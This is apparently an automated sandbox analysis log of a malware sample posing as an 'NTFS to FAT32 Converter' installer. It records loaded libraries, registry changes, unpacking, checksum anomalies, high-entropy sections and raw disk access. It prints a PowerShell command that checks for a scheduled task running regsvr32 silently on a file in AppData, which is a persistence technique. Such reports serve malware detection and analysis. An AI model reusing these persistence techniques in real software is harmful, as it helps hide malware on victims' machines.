                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: oledlg.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: httpapi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NTFS to FAT32 Converter_is1Jump to behavior
                    Source: nK8noQeiXl.exeStatic file information: File size 8422912 > 1048576
                    Source: nK8noQeiXl.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x7a2800

                    Data Obfuscation

                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Unpacked PE file: 5.2.ntfs2fat32converter102.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.ecert5:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Unpacked PE file: 0.2.nK8noQeiXl.exe.3430000.0.unpack
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Unpacked PE file: 5.2.ntfs2fat32converter102.exe.400000.0.unpack
                    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"
                    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"
                    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"
                    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Code function: 4_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 4_2_004502AC
                    Source: _RegDLL.tmp.4.dr | Static PE information: real checksum: 0x0 should be: 0xc2b7
                    Source: DrjfIAN86u.exe.1.dr | Static PE information: real checksum: 0x0 should be: 0x398b00
                    Source: Qv4wdsLMG.tmp.6.dr | Static PE information: real checksum: 0x0 should be: 0x12d621
                    Source: _setup64.tmp.9.dr | Static PE information: real checksum: 0x0 should be: 0x8546
                    Source: Qv4wdsLMG.tmp.8.dr | Static PE information: real checksum: 0x0 should be: 0x12d621
                    Source: _setup64.tmp.4.dr | Static PE information: real checksum: 0x0 should be: 0x8546
                    Source: Qv4wdsLMG.exe.1.dr | Static PE information: real checksum: 0x0 should be: 0x27719a
                    Source: UNIQTWO[1].file.1.dr | Static PE information: real checksum: 0x0 should be: 0x398b00
                    Source: UNIQ[1].file.1.dr | Static PE information: real checksum: 0xb3346 should be: 0x8aea9d
                    Source: is-AJ5Q5.tmp.4.dr | Static PE information: real checksum: 0x0 should be: 0xb2705
                    Source: is-F178L.tmp.4.dr | Static PE information: real checksum: 0x0 should be: 0x1b9553
                    Source: vn6ZAuKJ8m7U3.exe.1.dr | Static PE information: real checksum: 0xb3346 should be: 0x8aea9d
                    Source: _setup64.tmp.7.dr | Static PE information: real checksum: 0x0 should be: 0x8546
                    Source: is-UIRHH.tmp.4.dr | Static PE information: real checksum: 0x0 should be: 0x14980c
                    Source: is-LIN1F.tmp.9.dr | Static PE information: real checksum: 0x0 should be: 0x12e8da
                    Source: is-4R09J.tmp.9.dr | Static PE information: real checksum: 0x85bbf4 should be: 0x860013
                    Source: UNIQTHREE[1].file.1.dr | Static PE information: real checksum: 0x0 should be: 0x27719a
                    Source: DrjfIAN86u.tmp.3.dr | Static PE information: real checksum: 0x0 should be: 0xb3a7e
                    Source: _iscrypt.dll.4.dr | Static PE information: real checksum: 0x0 should be: 0x89d2
                    Source: ntfs2fat32converter102.exe.4.dr | Static PE information: section name: .ecert5
                    Source: is-RFHNE.tmp.4.dr | Static PE information: section name: /4
                    Source: is-RFHNE.tmp.4.dr | Static PE information: section name: /19
                    Source: is-RFHNE.tmp.4.dr | Static PE information: section name: /35
                    Source: is-RFHNE.tmp.4.dr | Static PE information: section name: /51
                    Source: is-RFHNE.tmp.4.dr | Static PE information: section name: /63
                    Source: is-RFHNE.tmp.4.dr | Static PE information: section name: /77
                    Source: is-RFHNE.tmp.4.dr | Static PE information: section name: /89
                    Source: is-RFHNE.tmp.4.dr | Static PE information: section name: /102
                    Source: is-RFHNE.tmp.4.dr | Static PE information: section name: /113
                    Source: is-RFHNE.tmp.4.dr | Static PE information: section name: /124
                    Source: NTFS2FAT32Converter.exe.5.dr | Static PE information: section name: .ecert5
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /4
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /19
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /35
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /51
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /63
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /77
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /89
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /102
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /113
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /124
                    Source: is-4R09J.tmp.9.dr | Static PE information: section name: /4
                    Source: is-4R09J.tmp.9.dr | Static PE information: section name: /14
                    Source: is-4R09J.tmp.9.dr | Static PE information: section name: /29
                    Source: is-4R09J.tmp.9.dr | Static PE information: section name: /45
                    Source: is-4R09J.tmp.9.dr | Static PE information: section name: /57
                    Source: is-4R09J.tmp.9.dr | Static PE information: section name: /71
                    Source: is-4R09J.tmp.9.dr | Static PE information: section name: /83
                    Source: is-4R09J.tmp.9.dr | Static PE information: section name: /96
                    Source: is-4R09J.tmp.9.dr | Static PE information: section name: /107
                    Source: is-4R09J.tmp.9.dr | Static PE information: section name: /123
                    Source: is-4R09J.tmp.9.dr | Static PE information: section name: /137
                    Source: is-4R09J.tmp.9.dr | Static PE information: section name: /153
                    Source: is-4R09J.tmp.9.dr | Static PE information: section name: /169
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Code function: 0_2_04F4A47C push ecx; mov dword ptr [esp], eax | 0_2_04F4A480
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Code function: 0_2_04F4508C push 0040599Dh; ret | 0_2_04F450D5
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Code function: 0_2_04F5518C push 00415A78h; ret | 0_2_04F551B0
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Code function: 0_2_04F52120 push ecx; mov dword ptr [esp], ecx | 0_2_04F52125
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Code function: 0_2_04F462EC push 00406BD8h; ret | 0_2_04F46310
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F462B4 push 00406BA0h; ret 0_2_04F462D8
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F45294 push 00405B80h; ret 0_2_04F452B8
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F52264 push 00412B50h; ret 0_2_04F52288
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F47254 push 00407B40h; ret 0_2_04F47278
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F4525C push 00405B48h; ret 0_2_04F45280
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F4637A push 00406C68h; ret 0_2_04F463A0
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F51C94 push 00412580h; ret 0_2_04F51CB8
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F52C9E push 0041358Ch; ret 0_2_04F52CC4
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F55D9E push 0041668Ch; ret 0_2_04F55DC4
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F42D4C push eax; ret 0_2_04F42D88
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F47E56 push 00408744h; ret 0_2_04F47E7C
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F56FC0 push 004178ACh; ret 0_2_04F56FE4
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F50890 push 0041117Ch; ret 0_2_04F508B4
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F50858 push 00411144h; ret 0_2_04F5087C
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F5291C push ecx; mov dword ptr [esp], ecx0_2_04F5291F
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F50AEC push 004113D8h; ret 0_2_04F50B10
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F51A50 push 0041233Ch; ret 0_2_04F51A74
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F50B24 push 00411410h; ret 0_2_04F50B48
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F4CB0C push 0040D3FCh; ret 0_2_04F4CB34
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeCode function: 1_2_1000F071 push ecx; ret 1_2_1000F084
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_004065B8 push 004065F5h; ret 3_2_004065ED
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_004040B5 push eax; ret 3_2_004040F1
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_00408104 push ecx; mov dword ptr [esp], eax3_2_00408109
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_00404185 push 00404391h; ret 3_2_00404389
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_00404206 push 00404391h; ret 3_2_00404389
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_0040C218 push eax; ret 3_2_0040C219
                    Source: ntfs2fat32converter102.exe.4.drStatic PE information: section name: .text entropy: 7.7153793231467205
                    Source: is-3S4JD.tmp.4.drStatic PE information: section name: .text entropy: 6.90903234258047
                    Source: NTFS2FAT32Converter.exe.5.drStatic PE information: section name: .text entropy: 7.7153793231467205

                    Persistence and Installation Behavior

                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 5_2_02D8E8B2
